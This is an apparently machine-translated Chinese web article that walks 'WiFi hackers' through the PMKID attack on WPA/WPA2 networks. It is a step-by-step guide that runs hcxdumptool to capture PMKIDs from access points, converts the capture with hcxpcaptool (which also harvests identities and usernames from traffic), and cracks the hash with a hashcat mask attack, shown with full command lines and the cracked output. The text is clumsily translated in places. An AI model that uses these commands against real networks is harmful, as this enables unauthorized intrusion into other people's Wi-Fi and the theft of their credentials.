快捷搜索:  汽车  科技

利用神器hcxdumptool来破解wifi密码(利用神器hcxdumptool来破解wifi密码)

利用神器hcxdumptool来破解wifi密码(利用神器hcxdumptool来破解wifi密码)强大的安全网络信息单元(RSN IE)是802.11管理框架中的可选框架,它在单个EAPOL框架中工作。这个WPA / WPA2 WiFi黑客密码攻击如何适用于WiFi黑客研究人员发现这次针对WiFi黑客的攻击在不执行EAPOL 4次握手的情况下破坏了WPA / WPA2密码。据Steube 谁是开发商 Hashcat 密码破解工具,新的攻击是在一个单一的EAPOL帧的RSN IE(稳健安全网络信息元素)进行。此外,这种攻击工作对所有类型的802.11i / p / q / r网络都启用了漫游功能,并且不清楚有多少供应商和这种技术可以使用多少路由器。

利用神器hcxdumptool来破解wifi密码(利用神器hcxdumptool来破解wifi密码)(1)

这篇文章中,我将介绍一种破解WPA PSK(预共享密钥)密码的新技术。

针对WiFi的新攻击方法黑客被发现破解WiFi密码,该密码通过WiFi网络中的WPA / WPA2保护,允许攻击者获得用于破解目标受害者使用的Wifi密码的预共享密钥哈希。

这一新的WiFi黑客方法是在针对最近发布的WPA3安全标准 的攻击中发现的,该标准自使用现代密钥建立协议的同步身份验证(SAE)以来极难破解。

Wi-Fi联盟发布的新WP3安全标准,为下一代Wi-Fi安全提供增强个人和企业网络的新功能,以及作为WPA2后续版本的新WP3安全标准 。

研究人员发现这次针对WiFi黑客的攻击在不执行EAPOL 4次握手的情况下破坏了WPA / WPA2密码。

Steube 谁是开发商 Hashcat 密码破解工具,新的攻击是在一个单一的EAPOL帧的RSN IE(稳健安全网络信息元素)进行。

此外,这种攻击工作对所有类型的802.11i / p / q / r网络都启用了漫游功能,并且不清楚有多少供应商和这种技术可以使用多少路由器。

这个WPA / WPA2 WiFi黑客密码攻击如何适用于WiFi黑客

强大的安全网络信息单元(RSN IE)是802.11管理框架中的可选框架,它在单个EAPOL框架中工作。

每当用户尝试使用路由器进行身份验证时,可以从RSN IE捕获成对主密钥ID(PMKID)。

利用神器hcxdumptool来破解wifi密码(利用神器hcxdumptool来破解wifi密码)(2)

“在这里我们可以看到已经捕获的PMKID是通过使用HMAC-SHA1来计算的,其中密钥是PMK,数据部分是固定字符串标签”PMK Name“,接入点的MAC地址和站的MAC的串联。地址。”

为了利用这种新攻击,作为WiFi黑客,您需要以下工具:

  • hcxdumptool v4.2.0或更高版本
  • hcxtools v4.2.0或更高版本
  • hashcat v4.2.0或更高版本

WiFi黑客 - 第1步

首先运行 hcxdumptool 以从AP获取PMKID,并使用以下代码将文件转储为PCAP格式。

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 -enable_status

输出如下所示:

start capturing (stop with ctrl c)

INTERFACE:……………: wlp39s0f3u4u5

FILTERLIST……………: 0 entries

MAC CLIENT……………: 89acf0e761f4 (client)

MAC ACCESS POINT………: 4604ba734d4e (start NIC)

EAPOL TIMEOUT…………: 20000

DEAUTHENTICATIONINTERVALL: 10 beacons

GIVE UP DEAUTHENTICATIONS: 20 tries

REPLAYCOUNTER…………: 62083

ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

WiFi黑客 - 第2步

运行名为hcxpcaptool的下一个工具,使用以下代码将捕获的数据从pcapng格式转换为hashcat接受的哈希格式。

$ ./hcxpcaptool -z test.16800 test.pcapng

写入文件的内容将如下所示,并分为4列。

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61 * 4604ba734d4e * 89acf0e761f4 * ed487162465a774bfba60eb603a39f3a

此外,Researcher建议WiFi黑客使用,虽然不需要,但建议使用选项-E -I和-U与hcxpcaptool。我们可以使用这些文件来提供hashcat。它们通常会产生良好的效果

  • -E从WiFi流量中检索可能的密码(此外,此列表将包含ESSID)
  • - 我从WiFi流量中检索身份
  • -U从WiFi流量中检索用户名

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

第3步

最后,运行hashcat来破解它,我们需要使用散列模式PMKID -16800,我们可以使用这个散列作为任何其他散列类型使用以下代码,

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

最后,它破解了散列 WPA-PMKID-PBKDF2

hashcat (v4.2.0) starting…

OpenCL Platform #1: NVIDIA Corporation======================================* Device #1: GeForce GTX 1080 2028/8112 MB allocatable 20MCU* Device #2: GeForce GTX 1080 2029/8119 MB allocatable 20MCU* Device #3: GeForce GTX 1080 2029/8119 MB allocatable 20MCU* Device #4: GeForce GTX 1080 2029/8119 MB allocatable 20MCUHashes: 1 digests; 1 unique digests 1 unique saltsBitmaps: 16 bits 65536 entries 0x0000ffff mask 262144 bytes 5/13 rotatesApplicable optimizers:* Zero-Byte* Single-Hash* Single-Salt* Brute-Force* Slow-Hash-SIMD-LOOPMinimum password length supported by kernel: 8Maximum password length supported by kernel: 63Watchdog: Temperature abort trigger set to 90c2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!Session……….: hashcatStatus………..: CrackedHash.Type……..: WPA-PMKID-PBKDF2Hash.Target……: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf…a39f3aTime.Started…..: Thu Jul 26 12:51:38 2018 (41 secs)Time.Estimated…: Thu Jul 26 12:52:19 2018 (0 secs)Guess.Mask…….: ?l?l?l?l?l?lt! [8]Guess.Queue……: 1/1 (100.00%)Speed.Dev.#1…..: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#2…..: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#3…..: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#4…..: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#*…..: 1641.3 kH/sRecovered……..: 1/1 (100.00%) Digests 1/1 (100.00%) SaltsProgress………: 66846720/308915776 (21.64%)Rejected………: 0/66846720 (0.00%)Restore.Point….: 0/11881376 (0.00%)Candidates.#1….: hariert! -> hhzkzet!Candidates.#2….: hdtivst! -> hzxkbnt!Candidates.#3….: gnxpwet! -> gwqivst!Candidates.#4….: gxhcddt! -> grjmrut!HWMon.Dev.#1…..: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1HWMon.Dev.#2…..: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1HWMon.Dev.#3…..: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1HWMon.Dev.#4…..: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1Started: Thu Jul 26 12:51:30 2018Stopped: Thu Jul 26 12:52:21 2018

当我们查看以前可用于WiFi黑客的WiFi黑客攻击时,我们需要坐下来等待目标用户稍后登录,我们可以通过捕获四次握手来破解密钥。

为了能够访问PMKID,这种新的攻击只需要尝试向无线网络进行身份验证,以后我们就可以轻松地破解WiFi密码和代表WiFi黑客的预共享密钥。

此外,这种方法更容易访问包含预共享密钥的哈希,以及稍后哈希将被破解的时刻,根据密码的复杂性,这种攻击也很复杂。

猜您喜欢: